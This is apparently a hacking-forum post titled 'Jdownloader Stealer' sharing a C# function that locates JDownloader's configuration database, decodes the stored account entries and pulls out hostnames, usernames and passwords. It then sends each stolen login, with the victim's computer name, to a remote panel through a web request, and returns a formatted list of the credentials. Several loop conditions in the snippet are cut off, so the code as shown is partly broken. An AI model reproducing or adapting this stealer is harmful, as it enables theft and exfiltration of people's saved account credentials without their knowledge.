• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

C# [Snippet] Jdownloader Stealer [C#]

Status
Not open for further replies.

sQuo

~ KillmeMories ~
Shadow
User
Joined
Oct 16, 2011
Messages
5,851
Reputation
0
Reaction score
22,904
Points
688
Credits
0
‎13 Years of Service‎
24%
Code:
>internal static string CNefBDMjQtKqwQYNsoomrdWdIiUjnq()
{
   string str6;
   string str3 = "";
   StringBuilder builder = new StringBuilder();
   string str5 = "";
   string str4 = "";
   string str2 = "";
   if (Interaction.Environ("Programfiles(x86)") == null)
   {
       str6 = Interaction.Environ("programfiles") + @"\jDownloader\config\database.script";
   }
   else
   {
       str6 = Interaction.Environ("programfiles(x86)") + @"\jDownloader\config\database.script";
   }
   if (!File.Exists(str6))
   {
       return "";
   }
   string str7 = "INSERT INTO CONFIG VALUES('AccountController','";
   string[] strArray = File.ReadAllLines(str6);
   int num6 = strArray.Length - 1;
   for (int i = 0; i     {
       if (strArray[i].Contains(str7))
       {
           string str8 = strArray[i].Substring(str7.Length - 1).Substring(1, strArray[i].Length - ((str7.Length + 1) + 3));
           int num7 = str8.Length - 1;
           for (int j = 0; j             {
               str3 = str3 + Conversions.ToString(Strings.Chr(Conversions.ToInteger("&H" + str8.Substring(j, 2))));
           }
           str8 = "";
           string[] strArray3 = str3.Split(new char[] { '\0' });
           int num8 = strArray3.Length - 1;
           for (int k = 0; k             {
               int charCode = 1;
               do
               {
                   strArray3[k] = strArray3[k].Replace(Conversions.ToString(Strings.Chr(charCode)), "");
                   charCode++;
               }
               while (charCode                 strArray3[k] = strArray3[k].Replace("\x00ff", "");
               if (strArray3[k] != "")
               {
                   str8 = str8 + "\r\n" + strArray3[k];
               }
           }
           string[] strArray2 = str8.ToString().Split(new char[] { '\r' });
           int num9 = strArray2.Length - 2;
           for (int m = 0; m             {
               if (strArray2[m].EndsWith("sq") & (strArray2[m].IndexOf(".") > 0))
               {
                   str2 = strArray2[m].Substring(0, strArray2[m].Length - 2);
               }
               if (strArray2[m].EndsWith("t") & strArray2[m + 1].EndsWith("xt"))
               {
                   str4 = strArray2[m].Substring(0, strArray2[m].Length - 1);
                   str5 = strArray2[m + 1].Substring(0, strArray2[m + 1].Length - 2);
                   if (str4.Length > 4)
                   {
                       builder.Append("Application: JDownloader\r\nHost: " + str2 + "\r\nUser: " + str5 + "\r\nPass: " + str4 + "\r\n\r\n");
                   }
                   new WebClient().DownloadString("?action=add&a=1&u=" + str2 + "&l=" + str5 + "&p=" + str4 + "&c=" + MyProject.Computer.Name.ToString());
               }
           }
       }
   }
   return builder.ToString();
}
 
Status
Not open for further replies.
Back
Top